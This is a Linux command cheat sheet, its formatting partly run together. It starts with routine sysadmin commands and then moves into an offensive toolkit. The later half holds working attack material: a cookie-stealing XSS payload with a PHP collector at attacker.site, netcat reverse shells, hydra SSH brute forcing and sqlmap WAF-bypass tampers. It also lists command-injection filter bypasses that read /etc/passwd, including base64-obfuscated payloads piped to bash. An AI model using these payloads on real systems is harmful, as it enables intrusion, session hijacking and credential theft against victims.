wc -l filename.txtcat filename.txtmkdir foldernamerm filenamerm -rf foldernamesudo rm filenametouch filenameprintf " " > tee filenamecat filename | grep -i "word"cat filename | grep -v "word"cd foldernamecdlocate filenamelsls -lcd ~/directory_inside_your_home_foldersudo service service_name statussudo fstrim -a -vsudo apt autoremove && sudo apt cleansudo cp filename ~/Pictures/foldernamesudo chown username:username filename sudo chown username:username *sudo chmod +x scriptname.ext./scriptnamehtopnetstat -a | grep -E "tcp|udp" | grep -i "https"netstat -pn | grep -E "tcp|udp"ps | awk ''{print $1"\t"$4}'ps -aux | awk '{print $1"\t"$2"\t"$NF}'awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwdawk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sorthistory | awk '{$1=""; sub(" ", " "); print}'cat ~/.zsh_history | awk -F ":" '{$1="";$2=""; sub(" ", " "); print}' | awk -F ";" '{$1=""; sub(" ", " "); print}'awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sortprint "\n=== Routing Tables ===\n" && netstat -r && print "\n\n=== Ports Scan ===\n" && netstat -pn | grep -E "tcp|udp" && print "\n\n=== Active Connections ===\n" && netstat -a | grep -E "tcp|udp" | grep -i "https" && print "\n\n=== Active Front Processes ===\n" && ps | awk '{print $1"\t"$4}' && print "\n\n=== Active All Processes ===\n" && ps -aux | awk '{print $1"\t"$2"\t"$NF}' && print "\n\n=== App Users ===\n" && awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwd && print "\n\n=== Installed Shells ===\n" && awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sortnc -v website.com 80Use openssl for https traffic
[\s\S].(WORD).*[\s\S]
^(.*?WORD) ?
| Name | Symbol | Pure Regex |
|---|---|---|
| Caret | ^ | ^ |
| Digit | \d | [0-9] |
| Not Digit | \D | [^\d] |
| Word | \w | [a-zA-z0-9] |
| Not Word | \W | [^\w] |
| Whitespace | \s | [\f\n\r\t\v] |
| Not Whitespace | \S | [^\s] |
sudo apt-get -o Acquire::Check-Valid-Until=false -o Acquire::Check-Date=false update- Add the following line
i915.enable_psr=0
Inside:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
After splash 2. Install Compton compositor
sudo apt -y install compton
For XFCE:
xfconf-query -c xfwm4 -p /general/use_compositing -s false
rm -rf ~/.config/xfce4/ && sudo reboot
- Goto compositor options of your ‘display settings’ and select ‘no compositor’ or any other option (IF you don't want any compositor!)
- ONLY use if driver issues persist - disable nouveau modeset
nouveau.modeset=0
Inside the line after splash
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
sudo systemctl restart NetworkManager.service- Try to restart dnsmasq service:
sudo service dnsmasq restart - Create and add google dns in resolver:
sudo touch /etc/resolv.confand addnameserver 8.8.8.8inside it.- Restart resolv service:
sudo systemctl restart systemd-resolved.service && sudo service systemd-resolved status
- Restart resolv service:
sudo netstat -ltnp | grep -w ':8080'lsof -i :8080ps -fA | grep pythonkill 81211kill -9 $(ps -A | grep python | awk '{print $1}')kill -9 $(ps -A | grep python | awk '{print $1}')cat old_file | grep -i "word_to_filter" | anew new_fileproxychains firefox -p profile_nameproxychains script_namegit clone --depth=1 https://github.com/username/reponame.gitsubl filenamesudo openvpn the_ovpn_file.ovpnssh username@servernameip route add 192.168.220.0/24 via 10.10.24.1rdesktop 192.168.200.10Start in new terminal!
sudo python -m SimpleHTTPServer 80assetfinder domain.com | anew filenamecat subdomain_list_file | httprobe | anew probed_urlsgau domain.com | anew all_urlscurl -X POST https://website.com/assets/somefolder/cli.PNG -d "_=command"python BMPinjector.py -i image.bmp "<scRiPt y='><'>/*<sCRipt* */prompt()</script"python3 ~/ParamSpider/paramspider.py --domain https://www.website.com/ -o ~/WorkingDirectory/website_directory/pspider--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywordspython3 ~/XSStrike/xsstrike.py -u https://website.com/param=FUZZ --fuzzersudo pandora bombgodork -q "inurl:search.php=" -p 50 | tee results.txtproxychains godork -q "inurl:search.php=" -p 50 | tee results.txtgobuster dir -url https://website.com/ | anew dirs && dirb https://website.com | anew dirsmkdir tmpwork && cd tmpwork && wget [https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip](https://github.com/TryCatchHCF/PacketWhisper/archive/master.zip)- Start python simple http server
- Goto victims machine & open outbound port
- Generate powershell cmd & start wireshark on attacker machine
- On victim machine, execute generated powershell code
fping -a -g 10.0.2.15/24 2> /dev/null
nmap -sn 10.0.2.15/24sudo nmap -sV -F -sS ip_addrAttacker machine:
nc -lvp 1337 -e /bin/bashVictim machine:
nc -v attackerip 1337On victim asset:
<script> var i = new Image(); i.src="https://attacker.site/get.php?cookie="+escape(document.cookie) </script>On attacker website:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen('jar.txt', 'a');
fwrite($fp, $ip.' '.$browser."\n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n\n");
fclose($fp);hydra server_ip_addr ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Password/rockyou-10.txt -f -Vairodump-ng --channel 1 wlan0 / airodump-ng --channel 1 --encrypt WPA1 wlan0airodump-ng --band abg wlan0airodump-ng --channel 1,2,3,4 / --essid AP_NAMEairodump-ng --band abg wlan0 / --essid AP_NAME / --bssid MAC_ADDRESS_OF_ORIGINAL_DEVICE- Using command seperate:
; pwd - Using command append:
&& cat /etc/passwd - Using pipe:
| cat /etc/passwd - Using quoted command - add quotes for any character in word (EX:
cat/et"c"/p"a"ssw"d") - Using wildcards - replace any word with "
*" & "?" (EX:cat /etc/pa*wdorcat /etc/p?sswd) - Using null vars - add
``in between words (EX:cat /e``tc/p``asswd) - Multi bypass - (EX:
|cat /"e"t``c/p?sswd) - Lethal injection 1 - reversed + multi filters (EX:
echo "dws?ap/c``t"e"/ tac" | rev | /bin/bash) - Lethal injection 2 - reversed + endeded + multi filters (EX:
echo "ZHdzP2FwL2NgYHQiZSIvIHRhYw==" | base64 -d | rev | /bin/bash)
Fuzzing for bypass: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/command-injection.md
"dws?ap/c``t"e"/ tac" | rev
- Test reflection On victim asset:
127.0.0.1 | nc ip_addr_attacker port_numberOn attacker machine:
nc -lvp port_number- If reflection success, get reverse shell On victim asset:
127.0.0.1 | nc ip_addr_attacker port_number -e /bin/bashOn attacker machine:
python -c "import pty:pty.spawn('/bin/bash')"